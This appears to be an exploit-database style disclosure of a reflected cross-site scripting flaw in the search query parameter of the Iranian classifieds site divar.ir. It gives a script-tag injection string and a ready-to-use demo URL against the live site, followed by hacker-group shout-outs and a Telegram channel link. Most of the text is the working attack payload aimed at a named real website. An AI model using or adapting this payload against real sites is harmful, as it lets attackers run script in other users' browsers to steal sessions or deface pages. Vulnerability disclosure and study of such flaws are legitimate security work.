##########################
# Exploit Title: Divar Cross Site Scripting
# Date: 2017-09-12
# Discovered By: ArashHC
# Tested on : Win10, Win8, Kali Linux
##########################
# Vulnerability is the site search field
query parameter have bug!
Inject this code after query=
"><script>alert('ArashHC')</script>
##########################
# Demo :
https://divar.ir/yazd/%DB%8C%D8%B2%D8%AF/browse/?query=%22%3E%3Cscript%3Ealert(%27a%27)%3C/script%3E
Only on firefox webbrowser!!
#############################
# Thanks to : EreBus, RexProg, JohnGH, AVENGER, ViRuS007,
BlackWolfIran, LM7RIX, AliCyber, </ZED>, Agent W, AnonyCoder, Sarbaz Vatan, unknown0707, FarsProg
# https://t.me/CyberSoldiersST
# CyberSoldiersST
# Discovered By: ArashHC